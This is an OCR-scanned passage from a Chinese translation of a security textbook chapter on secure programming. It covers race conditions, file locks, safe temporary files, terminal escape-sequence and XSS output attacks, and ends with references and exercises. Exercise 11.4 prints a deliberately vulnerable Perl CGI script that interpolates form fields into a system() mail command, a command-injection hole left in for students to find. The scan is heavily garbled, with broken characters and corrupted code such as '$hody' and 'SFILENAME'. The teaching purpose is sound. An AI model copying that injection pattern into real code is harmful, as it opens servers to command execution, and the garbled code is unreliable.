止 ， 所 有 使 用 该 同步 机 制 的 程序 必须 协作 。 在 执行 中 还 会 有 更 严重 的 缺陷 出 现 ， 首 先 程序 要 检 
查 文件 锁 ， 如 果 不 存在 就 产生 一 个 。 遗 憾 的 是 这 包含 一 个 致命 的 缺陷 。 假 设 有 两 个 进程 ， 每 个 
进程 都 试图 检查 并 产生 这 个 文件 锁 。 第 一 个 进程 检查 并 确认 文件 锁 不 存在 。 然 而 ， 在 它 产生 文 
件 锁 之 前 ， 系 统 将 该 进程 挂 起 而 让 其 他 进程 运行 。 而 在 此 时 ， 另 一 个 进程 也 检查 到 文件 锁 不 存 
在 并 产生 一 个 ， 并 进一步 使 用 共享 资源 。 接 着 第 二 个 进程 也 被 挂 起 ， 控 制 返回 第 一 个 进程 ， 第 
一 个 进程 也 将 产生 文件 锁 ， 进 一 步 同 时 访问 共享 资源 ， 这 时 在 共享 文件 中 的 数据 遭 到 破坏 。 这 
是 竞争 条 件 的 最 传统 的 解释 。 问 题 是 检查 文件 锁 不 存在 和 产生 文件 锁 的 过 程 必须 是 同时 进行 
的 ， 没有 中 断 的 可 能 ， 这 种 操作 被 称 为 原子 操作 (atomic operation)。 在 这 种 情况 下 不 要 孤立 地 
检测 文件 锁 的 存在 ， 而 是 同时 试 着 创建 它 ， 这 才 是 正确 的 实现 方法 。 文 件 创建 时 使 用 的 特定 选 
项 表明 若 文件 已 存在 则 创建 操作 失败 并 返回 相应 的 错误 代码 。 如 果 创 建 失败 ， 进 程 则 等 待 一 段 
时 间 ， 然 后 再 试 ， 直 到 成 功 。 操 作 系 统 利用 一 个 原子 操作 实现 了 这 个 功能 ， 提 供 对 资源 访问 的 
控制 和 保证 。 而 使 用 文件 锁 是 一 项 传统 的 技术 ， 该 技术 的 优点 是 锁 的 存在 很 清楚 ， 因 为 文件 锁 
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在 目录 列表 中 可 以 看 见 。 管 理 员 可 以 简单 地 删 掉 程序 残留 的 文件 锁 ， 它 们 可 能 是 程序 崩溃 造成 
的 ， 也 可 能 是 其 他 没有 成 功 删除 的 。 

文件 还 有 更 新 的 加 锁 机 制 。 这 可 以 是 建议 性 的 ， 也 可 以 是 强制 性 的 ， 操 作 系 统 保证 这 些 
加 锁 的 文件 能 够 被 恰当 地 访问 。 强 制 加 锁 可 以 删除 那些 在 加 锁 过 程 损坏 的 锁 ， 或 者 未 被 释放 的 
锁 。 这 些 机 制 在 不 同 的 操作 系统 上 实现 方式 是 不 同 的 。 因 此 ， 使 用 时 必须 注意 正确 使 用 选择 的 
机 制 。 

图 11-8 说 明了 在 一 个 Perl 脚本 中 flock 的 使 用 。 我 们 通常 在 一 个 Web CGI 表单 处 理 程序 
中 使 用 它 ， 用 于 将 用 户 提供 的 信息 添加 到 文件 中 。 随 后 ， 也 使 用 这 种 加 锁 机 制 的 另 一 个 程序 能 
够 访问 这 个 文件 ， 并 且 处 理 和 去 掉 这 些 相 应 的 细节 。 我 们 注意 到 还 有 一 些 复 杂 的 问题 ， 这 些 问 
题 与 使 用 不 同类 型 的 读 写 方式 的 加 锁 文 件 相关 。 这 些 特征 的 正确 使 用 必须 参考 适当 的 程序 或 
函数 。 


#!/usr/bin/perl 
# 


$EXCL_LOCK = 2; 
SUNLOCK = 8; 
$FILENAME = "forminfo.dat"; 


# open data file and acquire exclusive access lock 

open (FILE, ">> SFILENAME") || die "Failed to open $FILENAME \n"; 
flock FILE, $EXCL_LOCK; 

.. use exclusive access to the forminfo file to save details 

# unlock and close file 

flock FILE, $UNLOCK; 

close (FILE); 





图 11-8 Perl 中 文件 加 锁 实例 


11.4.5 ”安全 临时 文件 的 使 用 


很 多 程序 在 处 理 数据 的 时 候 ， 需 要 存储 数据 的 临时 副本 。 临 时 文件 通常 用 于 这 一 目的 。 大 
多 数 操作 系统 提供 了 存储 临时 文件 的 位 置 〈 临 时 文件 的 位 置 很 容易 找到 ) 和 用 于 命名 和 产生 这 
些 临 时 文件 的 标准 函数 。 有 关 临 时 文件 的 关键 问题 是 ， 它 们 应 该 是 唯一 的 并 且 不 能 被 其 他 进程 
访问 。 从 某 种 意义 上 讲 ， 这 与 管理 共享 文件 的 访问 是 对 立 的 。 构 造 文件 名 的 一 般 技术 是 在 名 字 
中 包含 一 个 值 ， 例 如 进程 标识 符 ( process identifier) 。 由 于 每 个 进程 有 不 同 的 标识 符 ， 这 就 保 
证 了 文件 名 的 唯一 性 。 程 序 通过 检查 确认 文件 不 存在 ， 然 后 产生 临时 文件 。 这 种 方法 从 可 靠 性 
的 观点 来 看 是 足够 的 ， 但 从 安全 的 观点 来 看 还 是 不 够 的 。 

事实 上 ， 攻 击 者 不 会 依据 规则 行事 。 他 们 试图 猜测 某 些 特权 程序 将 要 使 用 的 临时 文件 名 ， 
在 程序 检查 文件 不 存在 和 产生 临时 文件 的 两 个 动作 之 间 试 图 产生 一 个 临时 文件 。 这 是 竞争 条 件 
的 另 一 个 实例 ， 它 与 两 个 进程 竞争 访问 一 个 没有 加 锁 的 共享 文件 的 情形 非常 相似 。 在 文献 
[WHEE03] 中 有 这 样 一 个 著名 的 例子 ,文件 完整 性 验证 程序 9 Tripwire 的 某 些 版 本 一 直 受 到 这 
个 bug 的 困扰 。 攻 击 者 编写 一 个 脚本 重复 猜测 使 用 的 临时 文件 名 并 建立 一 个 指向 口令 文件 的 符 
号 链接 (symbolic link)。 因 为 访问 口令 文件 是 受 限制 的 ， 攻 击 者 不 能 将 内 容 写 人 口令 文件 。 然 
而 ，tripwire 程序 具有 root 用 户 权 限 ， 因 此 可 以 访问 系统 中 的 所 有 文件 。 如 果 攻 击 者 攻击 成 功 ， 
tripwire 程序 将 可 以 通过 符号 链接 将 口令 文件 作为 临时 文件 使 用 ， 破 坏 所 有 用 户 的 登录 信息 ， 
拒绝 系统 的 所 有 访问 ， 直 到 管理 员 用 备份 的 口令 文件 代替 当前 的 口令 文件 ， 这 种 情况 才 会 改 


© Tripwire 是 用 于 扫描 系统 中 所 有 目录 和 文件 ， 检 测 重 要 文件 是 否 发 生 非 授权 改变 的 工具 。Tripwire 可 以 用 于 
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变 。 这 是 一 种 针对 目标 系统 的 非常 有 效 但 并 不 方便 的 拒绝 服务 攻击 ， 这 表明 安全 地 管理 临时 文 
件 是 非常 重要 的 。 

安全 临时 文件 的 产生 和 使 用 更 需要 使 用 随机 的 临时 文件 名 。 文 件 名 的 产生 应 该 使 用 原子 
操作 ， 正 如 文件 锁 的 产生 过 程 那样 。 这 将 阻止 竞争 条 件 的 产生 和 文件 的 潜在 利用 。C 语言 的 标 
准 函 数 mkfile( 适合 用 于 此 目的 ， 然 而 旧 的 函数 tmpfile0 、tmpname(0 和 tempnam0 都 是 不 安全 
的 ， 使 用 时 要 小 心 。 对 文件 实现 最 小 访问 也 是 非常 重要 的 ， 在 大 多 数 情 况 下 ， 只 有 创建 该 文 
件 的 程序 的 所 有 者 才 可 以 访问 。GNOME 编程 指南 (the GNOME Programming Guidelines) 推 
荐 : ÉE Linux 和 UNIX 系统 中 使 用 图 11-9 所 示 的 C 语 言 代码 在 共享 目录 中 产生 临时 文件 。 尽 
管 代码 中 调用 了 不 安全 的 函数 tempnam()， 但 它 通过 使 用 适当 限制 文件 产生 标记 的 循环 来 弥补 
安全 方面 的 不 足 。 当 程序 不 再 使 用 文件 时 ， 必 须 关 闭 文件 并 删除 其 链接 。Perl 程序 员 可 以 使 用 
File::Temp 模块 安全 地 创建 临时 文件 。 使 用 其 他 语言 的 程序 员 也 应 该 采用 相应 的 方法 保证 临时 
交 件 的 安全 性 。 


char *filename; 
int fd; 
do { 


filename = tempnam (NULL, "foo"); 
fd = open (filename, O CREAT | O EXCL | O TRUNC | O RDWR, 0600); 
free (filename) ; 

} while (fd == -1); 





11-9 C 语 言 的 临时 文件 建立 示例 


当 在 共享 的 临时 目录 中 创建 文件 时 ， 其 权限 应 指定 为 仅 文件 的 所 有 者 或 者 系统 管理 员 可 
以 删除 它 。 通 常 这 并 不 是 默认 的 权限 设置 ， 必 须 进 行 修改 才能 保证 对 这 些 文件 的 安全 使 用 。 
正如 在 4.4 节 和 25.3 节 中 讨论 的 ,在 Linux fl UNIX 系统 中 需要 在 临时 目录 中 设置 防 删 除 位 
(sticky permission bit) 。 


11.46 与 其 他 程序 进行 交互 


除了 使 用 操作 系统 和 标准 库 函 数 提供 的 功能 ， 程 序 也 可 以 使 用 其 他 程序 提供 的 服务 。 在 和 
其 他 程序 进行 交互 时 ， 应 十 分 小 心 ， 任 何 对 于 程序 间 数 据 流 规模 和 解释 的 错误 假设 都 可 能 导致 
安全 漏洞 。 我 们 在 11.2 节 中 讨论 过 一 些 与 处 理 程序 输入 相关 的 问题 ， 在 11.5 节 中 我 们 将 讨论 
程序 输出 。 程 序 间 的 信息 流 可 以 被 看 作 一 个 程序 的 输出 形成 另 一 个 程序 的 输入 。 当 程序 在 初始 
设计 的 时 候 并 没有 考虑 当前 使 用 的 情况 ， 因 而 也 并 不 能 充分 识别 所 有 可 能 出 现 的 安全 漏洞 ， 这 
时 需要 给 予 特别 的 关注 。 特 别 地 ， 目 前 的 趋势 是 提供 Web 接口 给 用 户 先前 在 服务 器 系统 上 直 
接 运 行 的 程序 ， 这 会 导致 安全 漏洞 。 理 想 情况 是 把 所 有 程序 都 设计 为 自己 处 理 安全 事件 ， 并 在 
编码 时 采用 防御 性 程序 设计 ， 但 现实 并 非 如 此 。 因 此 ， 负 担 便 转 嫁 到 新 开发 的 程序 上 ， 我 们 在 
使 用 以 前 编写 的 程序 时 ， 必 须 识别 和 处 理 可 能 出 现 的 安全 问题 。 

进一步 需要 关注 的 问题 与 保护 多 个 程序 间 数 据 流 的 机 密 性 和 完整 性 有 关 。 当 多 个 程序 运行 
在 同一 个 计算 机 系统 上 时 ， 合 理 使 用 比如 管道 和 临时 文件 等 系统 功能 可 以 提供 这 样 的 保护 。 如 
果 程 序 运行 在 不 同 的 系统 上 ， 系 统 间 通过 网 络 相连 ， 那 么 这 些 网 络 连 接应 该 使 用 相应 的 安全 机 
制 。 可 供 选 择 的 安全 机 制 有 IP Security (IPSec), Transport Layer/Security Socket Layer Security (TLS/ 
SSL) 或 Secure Shell (SSH) 连接 。 即 使 采用 了 仔细 考虑 的 标准 化 协议 ， 也 需要 保证 使 用 强 密码 ， 
因为 在 大 多 数 算法 及 其 实现 中 都 发 现 了 弱 密 码 [SIMP11]。 我 们 将 在 第 22 章 讨论 这 些 话题 。 

从 安全 的 角度 讲 ， 检 测 和 处 理 程序 交互 中 产生 的 异常 和 错误 也 很 重要 。 当 一 个 进程 调用 另 
一 个 程序 作为 子 进 程 时 ， 父 进程 必须 保证 子 进程 正常 终止 并 接受 它 的 退出 状态 。 进 程 还 必须 捕 
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获 并 处 理 与 其 他 程序 或 操作 系统 交互 过 程 中 产生 的 信号。 


11.5 ”处 理 程序 输出 


我 们 的 程序 模型 的 最 后 一 个 组 件 就 是 输入 数据 经 过 处 理 和 相互 作用 后 产生 的 输出 。 这 些 输 
出 可 能 被 保存 下 来 为 以 后 使 用 (如 保存 在 文件 或 数据 库 中 )， 或 者 通过 网 络 传输 ， 或 者 显示 给 
其 他 用 户 。 和 程序 输入 一 样 ， 输 出 数据 也 可 以 分 成 二 进 制 数据 或 文本 数据 。 二 进 制 数 据 可 以 编 
码 成 复杂 结构 ， 比 如 X-Windows 显示 系统 用 以 创建 和 操作 复杂 图 形 接口 显示 组 件 所 使 用 的 结 
构 。 数 据 也 可 以 是 复杂 的 二 进 制 网 络 协议 结构 。 若 描述 文本 信息 ， 数 据 可 能 采用 一 些 字符 集 进 
行 编码 并 可 能 表示 为 一 些 结构 化 的 输出 ， 例 如 HTML. 

在 所 有 情况 下 ， 从 程序 安全 的 角度 讲 ， 输 出 和 预想 的 形式 相符 合 是 很 重要 的 。 如 果 直 接 传递 
给 用 户 ， 输 出 数据 可 能 被 一 些 程序 和 设备 解释 并 显示 。 如 果 输 出 中 包含 了 意外 的 内 容 ， 就 有 可 能 
发 生 异 常事 件 ， 对 用 户 产 生 不 利 影响 。 这 里 的 关键 问题 是 存在 一 个 常见 的 假设 。 如 果 用 户 正在 和 
程序 交互 ， 假 设 看 到 的 所 有 输出 是 该 程序 创建 的 ， 或 者 至 少 是 程序 确认 过 的 。 然 而 ， 正 如 我 们 
在 11.2 节 讨 论 的 跨 站 点 脚本 (XXS) 攻击 中 所 指出 的 ， 这 个 假设 可 能 不 成 立 。 一 个 程序 可 能 接 
受 一 个 用 户 的 输入 并 保存 ， 随 后 将 它 显 示 给 另外 的 用 户 。 如 果 该 输入 包含 一 些 内 容 ， 它 们 可 以 改 
变 显 示 数 据 的 程序 和 设备 的 行为 ， 而 且 程序 没有 完全 清除 这 些 内 容 ， 就 可 能 对 用 户 造成 攻击 。 

举 两 个 例子 。 第 一 个 例子 涉及 使 用 的 纯 文 本 终端 ， 如 VT100， 当 它 与 系统 进行 交互 S 时 ， 
一 个 简单 的 基于 文本 的 程序 在 典型 的 分 时 系统 上 运行 。 这 些 终端 通常 支持 一 系列 的 功能 键 ， 编 
写 这 个 程序 要 求 当 按 下 这 些 功能 键 时 可 以 发 送 任何 需要 的 字符 序列 ， 程 序 通过 发 送 一 个 特定 的 
FEX (escape) 序列 实现。 终端 识 别 这 些 序列 ， 不 是 将 这 些 字符 显示 出 来 ， 而 是 执行 请 求 的 操 
作 。 除 了 对 功能 键 进行 编程 外 ， 其 他 的 转 义 序列 可 以 用 来 控制 文本 输出 的 格式 (如 加 粗 、 下 划 
线 等 )， 改 变 当前 光标 的 位 置 。 需 要 说 明 的 是 ， 功 能 键 的 当前 内 容 应 该 被 发 送 ， 就 像 用 户 按 下 
了 对 应 的 键 。 利 用 上 面 的 功能 可 以 实现 一 个 经 典 的 针对 用 户 的 命令 行 注入 攻击 程序 ， 几 年 前 一 
个 学 生 编写 的 这 样 一 个 恶作剧 程序 就 流传 很 广 。 攻 击 者 操纵 正常 用 户 在 其 终端 上 显示 一 些 经 过 
仔细 设计 的 文本 。 这 可 以 通过 诱 使 正常 用 户 运行 一 个 程序 实现 ， 比 如 将 程序 包含 在 电子 邮件 
中 ， 或 者 直接 写 在 其 终端 上 ， 如 果 用 户 允 许 的 话 。 除 了 显示 一 些 无 关 的 信息 扰乱 正常 用 户外 ， 
文本 中 还 可 以 包含 一 些 转 义 序列 ， 首 先 编程 实现 发 送 特定 命令 的 功能 键 ， 接 着 是 发 送 文 本 的 命 
令 ， 就 好 像 经 编程 的 功能 键 被 按 下 一 样 。 如 果 显 示 文 本 的 程序 不 久 就 退出 了 ， 那 么 它 发 送 的 对 
应 特定 功能 键 的 文本 就 被 视 为 目标 用 户 键入 的 下 一 个 命令 。 因 而 ， 攻 击 者 可 以 完成 该 用 户 的 所 
有 操作 ， 可 能 包括 删除 用 户 文件 或 更 改 用 户 的 口令 。 使 用 这 种 简单 形式 的 攻击 ， 用 户 会 看 到 这 
些 命令 和 响应 被 显示 ， 知 道 已 经 受到 攻击 ， 但 来 不 及 阻止 攻击 。 如 果 加 入 另外 一 些 转 义 序列 的 
组 合 ， 攻 击 者 就 可 以 隐藏 这 些 信息 ， 阻 止 它 们 被 显示 ， 这 样 用 户 通过 直接 观察 无 法 察觉 是 否 受 
到 攻击 ， 直 到 攻击 的 后 果 变 得 越 来 越 明 显 。 该 攻击 的 新 版 本 利用 没有 被 充分 保护 的 X-terminal 
显示 功能 ， 可 以 达到 截获 和 控制 一 个 或 多 个 用 户 会 话 的 目的 。 

在 这 个 例子 中 ， 我 们 吸取 的 主要 教训 与 用 户 期 望 的 发 送 到 用 户 终端 显示 的 输出 数据 的 类 型 
有 关 。 用 户 期 望 显示 的 输出 是 纯 文 本 。 如 果 一 个 程序 如 文本 编辑 器 或 邮件 客户 端 使 用 格式 化 文 
本 或 可 编程 功能 键 ， 我 们 假设 程序 不 会 滥用 这 些 功 能 。 并 上 且 用 户 遇 到 的 大 多 数 这 类 程序 遵从 上 
面 的 约定 。 例 如 邮件 客户 端 ， 它 显示 来 自 其 他 用 户 的 数据 ， 需 要 对 文本 内 容 进行 过 滤 ， 保 证 里 
面 的 转 义 字符 不 被 执行 。 用 户 的 任务 是 检查 其 他 不 可 信 的 程序 ， 必 要 的 时 候 可 以 对 输出 进行 过 


日 ” 当 在 一 个 本 地 或 远程 系统 与 一 个 命令 行 的 shell 交互 时 ， 通 常 终端 程序 仿真 一 个 设备 。 
© ”这样 设 计 是 因为 这 些 序列 几乎 一 直 以 ASCI 字符 集中 的 转 义 字符 (ESC) 开始 。 
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滤 ， 阻 止 攻击 的 发 生 。 另 一 个 教训 是 要 确保 不 可 信 资 源 不 允许 直接 输出 到 用 户 界面 上 ， 特 别 是 
在 随后 的 这 种 攻击 的 X-terminal 变 体 中 。 如 果 是 传统 的 终端 ， 这 意味 着 不 允许 其 他 用 户 直接 向 
用 户 输出 上 写 消息 。 如 果 是 X-terminal， 意 味 着 配置 认证 机 制 保证 只 允许 在 用 户 命令 下 运行 的 
程序 可 以 访问 用 户 的 显示 器 。 

第 二 个 例子 是 利用 一 些 Web 服务 器 上 的 留言 板 进行 的 跨 站 点 脚本 (XSS) 攻击 。 如 果 该 留 
言 板 应 用 程序 没有 充分 检查 和 清理 用 户 提供 的 输入 ， 那 么 接 下 来 在 用 户 浏览 这 些 留言 时 这 个 输 
入 能 够 用 于 实现 一 次 攻击 。 该 攻击 利用 了 一 个 假设 以 及 当 访问 一 个 站 点 的 内 容 时 Web 浏览 器 
所 使 用 的 安全 模型 。 浏 览 器 假设 所 有 内 容 都 是 那个 站 点 产生 的 ， 也 是 同等 可 信 的 。 这 就 允许 可 
编程 内 容 如 JavaScript 访问 或 修改 站 点 的 数据 或 元 数据 ， 例 如 和 那个 站 点 相关 的 cookie。 这 里 
的 问题 在 于 并 不 是 所 有 数据 都 是 该 站 点 产生 或 者 在 该 站 点 的 控制 下 产生 的 。 可 能 有 些 数据 来 自 
不 可 信 的 用 户 。 

任何 收集 或 依赖 第 三 方 数据 的 程序 都 必须 负责 保证 数据 对 于 后 续 的 用 户 是 安全 的 ， 不 会 
违反 用 户 的 假设 。 这 些 程序 必须 区 分 哪些 输出 是 允许 的 ， 并 且 过 滤 掉 任何 不 可 信 数 据 ， 保 证 只 
有 有 效 的 输出 被 显示 。 最 简单 的 过 滤 方 法 是 删除 所 有 的 HTML 标记 。 这 当然 会 使 输出 变 得 安 
全 ， 但 是 这 与 一 些 使 输出 格式 化 的 需求 相 冲 突 。 那 么 可 以 选择 仅 保留 安全 的 标记 。 与 对 输入 进 
行 过 滤 一 样 ， 我 们 的 重心 在 于 仪 保留 安全 的 标记 而 不 是 试图 将 危险 的 标记 删除 ， 因 为 对 于 危险 
(dangerous) 的 解释 可 能 随时 间 而 变化 。 

这 里 涉及 的 另外 一 个 问题 是 不 同 的 字符 集 允 许 对 元 字符 的 不 同 编码 方式 ， 这 会 改变 对 有 效 
输出 的 解释 。 如 果 特 定 的 显示 程序 或 设备 对 于 采用 的 具体 的 编码 方式 并 不 知情 ， 可 能 引发 对 程 
序 的 不 同 假设 ， 从 而 可 能 导致 过 滤 失 败 。 因 此 ， 对 程序 而 言 要 么 明确 指定 可 能 的 编码 方式 ， 要 
么 保证 编码 方式 和 显示 意愿 相符 合 ， 这 是 很 重要 的 。 这 就 是 输出 标准 化 ， 程 序 保证 输入 数据 有 
一 个 公共 的 最 小 可 选集 合 。 在 网 页 输出 时 ， 为 Web 服务 器 明确 指定 在 Content-Type HTTP 响应 
X (response header) 中 采用 的 字符 集 ， 这 是 可 能 的 。 不 幸 的 是 ， 有 时 我 们 无 法 指定 。 如 果 无 法 
指定 ， 浏 览 器 会 假设 一 个 默认 使 用 的 字符 集 。 这 个 假设 没有 被 系统 化 ， 因 此 不 同 的 浏览 器 会 做 
出 不 同 的 选择 。 如 果 需 要 过 滤 输 出 ， 就 应 该 指定 字符 集 。 

我 们 注意 到 这 些 例子 的 安全 漏洞 都 是 由 程序 输出 导致 的 。 但 是 威胁 的 目标 不 是 产生 输出 的 
程序 ， 而 是 用 来 显示 输出 的 程序 或 设备 。 我 们 可 以 认为 这 和 程序 员 没 有 关系 ， 因 为 程序 本 身 并 
没有 错误 。 然 而 ， 如 果 程 序 被 用 作 攻 击 工 具 ， 程 序 员 的 名 声 也 会 被 焉 污 ， 用户 就 不 愿 使 用 这 些 
程序 。 在 XSS 攻击 的 案例 中 ,很 多 知名 的 站 点 受到 牵连 ,并且 遭受 到 不 利 影响 。 


11.6 ”推荐 读物 


文献 [MCGR06] 对 文献 [VIEG01] 进行 了 更 新 和 拓展 ， 这 两 篇 文献 在 有 关 软 件 安全 的 专题 
讨论 中 被 广泛 引用 。[HOWA07] 探讨 了 微软 Windows 系统 安全 代码 编写 的 许多 细节 问题 ， 而 
[WHEE03] 提供 了 Linux 系统 和 UNIX 系统 安全 代码 编写 的 很 多 细节 。[NIST04] 提供 了 一 组 通 
常 的 开 安 全 原理 ， 这 些 原理 特别 适用 于 软件 安全 。[SIMP11] 描述 了 一 系列 当前 业界 最 前 沿 的 
安全 程序 开发 方法 ， 这 些 方法 通过 安全 代码 可 以 正确 使 用 。[MILL07] 是 讨论 使 用 fzzing 技术 
检测 运行 在 通用 操作 系统 上 的 程序 的 一 系列 文章 中 最 新 的 一 篇 。[LAND94] 是 有 关 程 序 代码 中 
安全 缺陷 的 汇编 ， 非 常 值得 学 习 。 


HOWA07 Howard, M., and LeBlanc, D. Writing Secure Code for Windows Vista. 
Redmond, WA: Microsoft Press, 2007. 

LAND94 Landwehr, C., et al. “A Taxonomy of Computer Program Security Flaws.” 
ACM Computing Surveys, Volume 26 Issue 3, September 1994. 

MCGRO06 McGraw, G. Software Security: Building Security In. Reading, MA: 
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Addison-Wesley, 2006. 

Miller, B.; Cooksey, G.; and Moore, F. “An Empirical Study of the 
Robustness of MacOS Applications Using Random Testing.” ACM 
SIGOPS Operating Systems Review, Volume 41 Issue 1, January 2007. 
National Institute of Standards and Technology. Engineering Principles 
for Information Technology Security (A Baseline for Achieving Security). 
Special Publication 800-27 Rev A, June 2004. 


Simpson, S. (ed) Fundamental Practices for Secure Software Development, 
Second edition, SAFECode, February 2011. 


Viega, J., and McGraw, G. Building Secure Software: How to Avoid Security 
Problems the Right Way. Reading, MA: Addison-Wesley, 2001. 


WHEE03 Wheeler, D. Secure Programming for Linux and Unix HOWTO. Linux 
Documentation Project, 2003. 


1.7 关键 术语 、 复 习题 和 习题 
关键 术语 


MILL07 


NIST04 


SIMP11 


VIEG01 


atomic operation (原子 操作 ) memory leak (内 存 泄漏 ) 
canonicalization (标准化 ) privilege escalation (特权 扩大 ) 
code injection (代码 注入 ) race condition (竞争 条 件 ) 


command injection (命令 注入 ) 

cross-site scripting (XSS) attack ( 跨 网 站 脚本 攻击 ) 
defensive programming (防御 性 程序 设计 ) 
environment variable (环境 变量 ) 

fuzzing (fuzzing 技术 ) 

injection attack (EA Dit) 

least privilege (最 小 特权 ) 


复习 题 


11.1 试 述 软 件 质量 和 可 靠 性 与 软件 安全 的 区 别 。 
1.2 ” 试 述 什么 是 防御 性 程序 设计 。 
11.3” 列 出 一 些 可 能 的 程序 输入 资源 。 


regular expression (正则 表达 式 ) 
secure programming (安全 程序 设计 ) 
software quality (软件 质量 ) 
software reliability (软件 可 靠 性 ) 
software security (软件 安全 ) 

SQL injection (SQL 注入 ) 

XSS reflection (XSS 反射 ) 


11.4 给 出 注 人 攻击 的 定义 ， 列 举 一 些 注 人 攻击 的 例子 。 注 人 攻击 通常 在 什么 环境 下 被 发 现 ? 
11.5 令 述 命令 攻击 和 SQL 注入 攻击 的 相同 点 和 不 同 点 。 

11.6 试 述 什 么 是 跨 站 点 脚本 攻击 ， 列 举 一 些 这 类 攻击 的 例子 。 

11.7 叙述 一 个 程序 员 在 对 程序 输入 的 假设 进行 验证 时 使 用 的 主要 技术 。 

11.8 ”叙述 在 使 用 Unicode 字符 集 进行 输入 验证 时 可 能 出 现 的 问题 。 

11.9 给 出 输入 的 fuzzing 技术 的 定义 ， 叙述 在 什么 情况 下 可 以 使 用 该 技术 。 

11.10 列举 几 个 与 编写 安全 程序 代码 相关 的 软件 安全 问题 。 

11.11 给 出 竞争 条 件 的 定义 ,叙述 在 多 个 进程 访问 共享 内 存 时 竞争 条 件 是 怎样 产生 的 。 
11.12 指出 在 shell 脚本 中 使 用 环境 变量 时 相关 的 问题 。 


11.13 ”给 出 最 小 特权 原则 的 定义 。 


11.14 ”指出 与 文件 锁 的 正确 产生 和 使 用 相关 的 问题 。 


11.15 在 共享 目录 中 可 以 正确 创建 和 使 用 临时 文件 ， 指 出 与 此 有 关 的 问题 。 
11.16 ”列举 当 一 个 程序 将 未 经 验证 的 输入 从 一 个 用 户 发 送 到 另 一 个 用 户 时 可 能 产生 的 问题 。 
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习题 


11.1 探讨 在 不 同 的 语言 环境 中 如 何 编写 正则 表达 式 或 样本 。 

11.2 Æ Linux/UNIX 系统 上 脚本 运行 其 他 命令 时 通常 使 用 Boure shell， 讨 论 该 shell 使 用 的 所 有 元 字符 
的 含义 。 将 该 列表 和 其 他 常用 的 shell 如 BASH 或 CSH 使 用 的 元 字符 列表 相 比较 。 为 了 防止 命令 
注 和 攻击 进行 的 输入 有 效 性 检查 表明 了 什么 ? 

11.3 重 写 图 11-2 所 示 的 Perl finger CGI 脚本 ， 使 其 包括 适当 的 输入 验证 和 更 多 的 错误 信息 ， 如 11.2 节 
中 的 脚注 3 所 建议 的 那样 。 扩 展 输入 验证 使 其 允许 字符 一 、 十 、% 出 现在 $user 值 中 间 ， 但 不 能 出 
现在 该 值 的 开始 或 结束 位 置 。 进 一 步 考虑 允许 空格 或 tab 出 现在 该 值 中 的 情况 。 由 于 这 些 值 将 参数 
和 shell 命令 分 开 ， 当 传递 给 finger 命令 时 ，$user 值 必须 被 引号 括 起 来 。 考 虑 这 是 如 何 实现 的 。 如 
果 可 能 的 话 ， 将 你 修改 的 脚本 以 及 用 来 调用 它 的 表单 复制 到 Linux/UNIX Web 服务 器 上 ， 验 证 操作 
是 否 正确 。 

11.4 增强 用 来 给 你 的 服务 器 的 网 络 管理 员 发 送 注释 的 CGI 处 理 脚 本 的 安全 性 。 当 前 使 用 的 脚本 如 
图 11-10a 所 示 ， 相 应 的 表单 在 图 11-10b 中 。 考 察 该 脚本 中 出 现 的 安全 问题 。 列 出 改正 所 需 的 详细 
步 又， 设计 一 个 该 脚本 的 增强 版 。 


#1!/usr/bin/perl 

# comment.cgi - send comment to webmaster 
# specify recipient of comment email 

$to = "webmaster"; 


use CGI; 
use CGI::Carp qw(fatalsToBrowser) ; 
$q = new CGI; # create query object 


# display HTML header 

print $q->header, 
$q->start_html('Comment Sent'), 
$q->h1('Comment Sent') ; 


# retrieve form field values and send comment to webmaster 
$subject = $q->param("subject") ; 

$from = $q->param("from") ; 

$body = $q->param("body") ; 


# generate and send comment email 
system("export REPLYTO=\"$from\"; echo \"$hody\" | mail -s \"$subject\" 
$to"); 


# indicate to user that email was sent 
print "Thank you for your comment on $subject."; 
print "This has been sent to $to."; 


# display HTML footer 
print $q->end_html; 





a) 注释 CGI 脚本 


<html><head><title>Send a Comment</title></head><body> 

<hl> Send a Comment </hi> 

<form method=post action="comment.cgi"> 

<b>Subject of this comment</b>: <input type=text name=subject 
value=""> 

<b>Your Email Address</b>: <input type=text name=from value=""> 


<p>Please enter comments here: 

<p><textarea name="body" rows=15 cols=50></textarea> 
<p><input type=submit value="Send Comment"> 

<input type="reset" value="Clear Form"> 
</form></body></html> 





b) Web 注 释 表单 
图 11-10 注释 表单 处 理 练习 


11.5 


11.6 


11.7 


11.8 


11.9 
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研究 PHP 或 其 他 合适 的 Web 脚本 语言 中 的 一 些 可 用 函数 ， 它 们 用 来 清洁 随后 在 SQL 查询 中 使 用 
的 数据 。 

研究 PHP 或 其 他 合适 的 Web 脚本 语言 中 的 一 些 可 用 函数 ， 它 们 用 来 解释 表单 数据 中 使 用 的 HTML 
和 URL 编码 ， 在 检查 或 进一步 使 用 前 将 其 值 规范 化 。 

增强 程序 安全 性 的 一 个 方法 是 使 用 fuzzing 工具 。 正 如 在 11.2 节 中 介绍 的 ， 这 些 测 试 程序 使 用 大 量 
自动 产生 的 输入 。 考 查 一 些 你 所 熟知 的 系统 上 的 fuzzing 工具 。 分 析 其 代价 、 可 用 性 和 易 用 性 。 思 
考 适 合 使 用 这 些 工具 的 开发 项 目的 类 型 。 

增强 程序 安全 性 的 另 一 个 方法 是 使 用 静态 分 析 工 具 ， 扫 描 程序 代码 发 现 程序 漏洞 。 考 查 一 些 针对 
你 所 熟悉 语言 的 静态 分 析 工 具 。 分 析 其 代价 、 可 用 性 以 及 易 用 性 。 思 考 适合 使 用 这 些 工具 的 开发 
项 目的 类 型 。 ' 

查看 你 所 使 用 的 系统 的 所 有 环境 变量 的 当前 值 。 如 果 可 能 的 话 ， 分 析 这 些 值 的 使 用 。 思 考 如 何 为 
单个 进程 以 及 其 子 进程 临时 修改 这 些 值 以 及 为 后 续 的 系统 登录 永久 改变 这 些 值 。 


11.10 Æ Linux/UNIX 系统 上 ， 尝 试 使 用 你 自己 的 小 数据 文件 检测 图 11-6a 和 图 11-6b 中 有 漏洞 的 shell 


脚本 。 先 修改 PATH 变量 的 值 ， 接 着 修改 IFS 变量 的 值 ， 使 脚本 执行 你 所 选择 的 其 他 程序 。 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

o 列 出 系统 安全 加 固 过 程 中 所 需 的 步骤 ; 
详 述 规划 系统 安全 的 需求 ; 
列 出 用 于 加 固 基 本 操作 系统 的 基本 步骤 ; 


列 出 用 于 加 固 关键 应 用 所 需 的 额外 步骤 ; 
列 出 维护 系统 安全 所 需 的 步骤 ; 

